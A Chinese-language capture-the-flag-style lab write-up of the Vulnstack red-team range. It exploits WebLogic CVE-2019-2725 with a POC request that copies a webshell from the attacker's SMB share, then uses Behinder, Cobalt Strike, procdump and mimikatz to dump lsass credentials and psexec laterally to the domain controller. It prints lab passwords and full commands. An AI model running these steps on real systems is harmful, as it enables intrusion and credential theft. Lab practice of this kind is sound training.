靶场实战 | ATT&CK实战 Vulnstack 红队(二)
本文来自“白帽子社区知识星球”
作者:Snakin
DCIP:10.10.10.10 OS:Windows 2012(64)应用:AD域WEBIP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64)应用:Weblogic 10.3.6 MSSQL 2008PCIP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32)应用:攻击机IP:192.168.111.5 OS:Kali
nmap扫描
nmap -p- -T5 192.168.111.80 -o web
-p- 表示扫描所有端口;
-T5 指定扫描过程使用的时序,总共有6个级别(0-5),级别越高,扫描速度越快, 但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T4。
-o 保存扫描结果到文件web
常用端口是开放状态1433是mssql,7001我们知道是weblogic服务,因为我们前面手工 开启的。考虑weblogic服务漏洞,找到WeblogicScan工具扫一下。(WeblogicScan工具下载链接请在后台回复“工具链接”)
python3 WeblogicScan.py -u 192.168.111.80 -p 7001
发现一个漏洞
CVE-2019-2725漏洞描述:
这是一个Weblogic反序列化远程代码执行漏洞。部分版本 WebLogic中默认包含的 wls9_async_response 包,为WebLogic Server提供异步通 讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心 构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。
我们需要先把/root/Behinder/server/shell.jsp webshell木马程序上传weblogic服务器上。然后再使用冰蝎连接shell.jsp木马程序。
impacket-smbserver share /root/桌面/Behinder/server &POC:
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.111.80:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98
Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,
image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 841
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
xx
xx
xmlns:work="http://bea.com/2004/06/soap/workarea/">
cmd
/c
copy \\192.168.111.5\share\shell.jsp
servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpk
ys\war\1.jsp
发包:
202状态码:Accepted 表示服务器端已经收到请求消息,但是尚未进行处理。但是对 于请求的处理却是无保证的,即稍后无法通过 HTTP 协议给客户端发送一个异步请 求来告知其请求的处理结果。这个状态码被设计用来将请求交由另外一个进程或者服 务器来进行处理,或者是对请求进行批处理的情形。
问题:发现无法访问共享的文件
上传冰蝎的马
启动冰蝎
java -jar Behinder_v3.0_Beta6_linux.jar &
冰蝎连接
URL:http://192.168.111.80:7001/_async/shell.jsp
密码:rebeyond
连接成功
CS上线:启动cs服务器,密码是123456
./teamserver 192.168.111.5 123456 &启动客户端
./start.sh &
接下来创建一个监听器
在Attacks中选择
选择之后保存,再利用冰蝎上传这个exe文件
接下来在虚拟终端中运行这个程序即可
打开会话,将命令执行周期修改为2s
查看当前用户身份,为admin账户
使用 procdump64+mimikatz 获取win用户明文密码
procdump64.exe 介绍:它的主要目的是监控应用程序的CPU异常动向, 并在此异常
时生成crash dump文件, 供研发人员和管理员确定问题发生的原因。
lsass.exe 进程概述:lsass.exe是一个系统进程,用于微软Windows系统的安全机 制。它用于本地安全和登陆策略。也就是说lsass.exe进程运行后,里面会保存用户帐号和密码信息。
beacon> shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp参数说明:
-accepteula参数:指定是否自动接受 Microsoft 软件许可条款。所有无人参与安装都需要此设置。-ma 参数:生成full dump, 即包括进程的所有内存. 默认的dump格式包括线程和句柄信息.
解密,这里数字卫士没有拦击并不说明 mimikatz 是免杀的,实际环境如果 mimikatz 不是免杀的需 要将 lsass.dmp 文件拖回本地放至相同的系统中进行解密。
shell mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
"exit"> password.txt
直接使用 download 命令下载,下载后会保存到程序目录的 downloads 目录。
hashdump
logonpasswords
目前得到域用户信息:
域用户名:de1ay\mssql 密码:1qaz@WSX域用户名:de1ay\administrator 密码:1qaz@WSX #这是DC域管理员用户和密码本地用户名:WEB\de1ay 密码:1qaz@WSX 该用户是系统本地登录系统用的。
查看网络信息找到域控
beacon> shell ipconfig /all
DNS 服务器 10.10.10.10 也就是域控。查看域控制器
beacon> shell net group "domain controllers" /domain获得:
主机名:DC,完整主机是:DC.de1ay.com再确认主机名为DC的IP地址:beacon> shell ping dc或:beacon> shell ping DC
成功ping通
接下来查看域管理员
shell net group "domain admins" /domain回到控制目标主机的初始用户账户下
beacon> rev2self查看当前的权限:
beacon> getuid通过前面获取到的DC的DE1AY\administrator账户信息,生成新的凭证。
beacon> make_token DE1AY\administrator 1qaz@WSX创建新的监听实现中转,便于通过命名管道 psexec 通过 SMB Listener 横向过去。
名称就叫smb这个后面要用。
DC上线,jump会使用前面的凭证和smb监听器,完成登录DC的过程.
beacon> jump psexec DC smb或:jump psexec 10.10.10.10 smb #目标机器可以是 DC 主机名,也可以是 IP
拿下域控
如果觉得本文不错的话,欢迎加入知识星球,星球内部设立了多个技术版块,目前涵盖“WEB安全”、“内网渗透”、“CTF技术区”、“漏洞分析”、“工具分享”五大类,还可以与嘉宾大佬们接触,在线答疑、互相探讨。
▼扫码关注白帽子社区公众号&加入知识星球▼